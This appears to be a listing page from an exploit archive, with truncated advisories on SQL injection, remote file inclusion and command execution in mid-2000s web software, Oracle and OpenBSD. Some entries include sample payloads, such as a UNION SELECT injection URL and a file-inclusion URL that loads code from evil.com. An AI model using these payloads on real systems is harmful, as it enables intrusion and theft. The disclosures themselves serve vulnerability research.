GuppY <= 4.5.16 Remote Commands Execution Exploit

No description provided by source. ?php printr' --------------------------------------------------------------------------- Guppy = 4.5.16 remote commands execution exploit by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org dork: "Site powered by GuppY" | "Site cr驠avec Gupp...

Makit Newsposter Script News_Page.ASP SQL注入漏洞

Makit Newsposter Script是一款基于ASP的WEB应用程序。 Makit Newsposter Script不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'NewsPage.ASP'脚本对用户提交的'uid'参数缺少过滤，提交恶意SQL脚本代码作为参数数据，可更改原来的SQL逻辑，导致获得敏感信息。 Makit Newsposter Script 目前没有详细解决方案提供： http://www.makit.net/...

aspedge12b-sql.txt

Title : ASP EDGE = V1.2b user.asp Remote SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://aspedge.cjb.net || http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7530&lngWId=4 $$ : Free SQL---------------------------------------------------------...

Forum Livre 1.0 (SQL Injection / XSS) Multiple Remote Vulnerabilities

No description provided by source. Title : Forum Livre 1.0 Multiple Remote Vulnerabilities Author : ajann Contact : : $$ : Free SQL--------------------------------------------------------- Login Before..- http://target/path//infouser.asp?user=SQL Example:...

SQL Injection in Unique Ads ( UDS )

Hello Vulnerable : uds Version: 1.x web : http://www.egyptechno.com The bug : http://example.com/uds/banner.php?bid=SQL Example : http://example.com/uds/banner.php?bid=-5520union20select20null,null,null20from20uds ,,,,,,, Discoverey By : LinuxDrox www.LeZr.com Best Regards ,,...

LocazoList 2.01a beta5 - 'subcatID' SQL Injection

Title : LocazoList = v2.01a beta5 subcatID Remote SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://www.locazo.net:81 Dork : "Powered by Locazolist Copyright © 2006" $$ : $100 SQL---------------------------------------------------------...

Backup implementation

Backup implementation I. Intro II. Tools III. Strategy Well, now let's talk about how to live with all this correctly. The backup process consists of three stages: planning, implementation and support. We have already talked a little about support and implementation, but planning is the most...

x-news 1.1 - users.txt Remote Password Disclosure

x-news 1.1 - users.txt Remote Password Disclosure x-news 1.1 Password Disclosure Vulnerability Affected Software: x-news 1.1 x-news Website: http://xqus.com Bugfounder: bd0rk Website: www.soh-crew.it.tt Contact: bd0rkathackermail.com Greetings: str0ke, Perle, TheJT, ajann +Exploit:...

Calendar MX BASIC <= 1.0.2 (ID) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ================================================================== Calendar MX BASIC = 1.0.2 ID Remote SQL Injection Vulnerability ================================================================== Title : Calendar MX BASIC = 1.0.2 ID Remo...

Typo3 Class.TX_RTEHTMLArea_PI1.PHP多个命令执行漏洞

Typo3是一款基于PHP的WEB应用程序。 Typo3不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是脚本对用户提交的'useruid'参数缺少过滤，提交包含SHELL元字符命令的字符串作为参数数据，可导致以WEB权限执行任意命令。 Typo3 Typo3 4.0.3 Typo3 Typo3 4.0.2 Typo3 Typo3 4.0.1 Typo3 Typo3 3.7 .0 Typo3 Typo3 4.0 Typo3 Typo3 3.8 http://typo3.org/ Attackers can exploit these issues via ...

3editor CMS &lt;= 0.42 (index.php) Local File Include Vulnerability

No description provided by source. script Name: 3editor CMS index.php Local File Include Exploit Download:http://www.matteolucarelli.net/3editor/index.htm Author : Dr Max Virus Contact :[email protected] Bug & Problem In file index.php Let's Take a look; if !isset$GET'page'...

Oracle &lt;= 9i / 10g (extproc) Local/Remote Command Execution Exploit

No description provided by source. -- -- $Id: raptororaextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ -- -- raptororaextproc.sql - command exec via oracle extproc -- Copyright c 2006 Marco Ivaldi [email protected] -- -- Directory traversal vulnerability in extproc in Oracle 9i and 10g --...

Microsoft Windows csrss &#40;?&#41; memory corruption exploited in-the-wild

Dear [email protected], On one of Russian forum security vulnerability is discussed in Microsoft Windows Windows XP is tested. A vulnerability is caused by memory corruption is string beginning with "?" is send thorugh MessageBox API with MBSERVICENOTIFICATION flag. It looks like some "debug"...

PSlash lvc_include_dir远程文件包含漏洞

PSlash是一款基于PHP的WEB应用程序。 PSlash不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'config.inc.php'脚本对用户提交的'lvcincludedir'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 Derek Leung pSlash 0.70 http://www.pslash.com/...

CM68 News &lt;= 12.02.06 &#40;addpth&#41; Remote File Inclusion Vulnerability

Vulnerable Software:cm68news Vulnerable file: /engine/oldnews.inc.php Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?& milw0rm.com 2006-12-08...

CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================== CM68 News = 12.02.06 addpth Remote File Inclusion Vulnerability ================================================================== Vulnerable Software:cm68news Vulnerable...

uPhotoGallery 1.1 - Slideshow.asp?ci SQL Injection

uPhotoGallery 1.1 - Slideshow.asp?ci SQL Injection source: https://www.securityfocus.com/bid/21319/info uPhotoGallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allo...

2020 Real Estate 3.2 - listings.asp SQL Injection

2020 Real Estate 3.2 - listings.asp SQL Injection source: https://www.securityfocus.com/bid/21036/info 20/20 Real Estate is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...

PHP-Post &lt;= 1.01 (template) Remote Code Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+:...

OpenBSD ftp Exploit (teso)

No description provided by source. / 7350-crocodile - x86/OpenBSD ftp exploit by lorian and scut / TESO=20 TESO CONFIDENTIAL - SOURCE MATERIALS This is unpublished proprietary source code of TESO Security. The contents of these coded instructions, statements and computer programs may not be...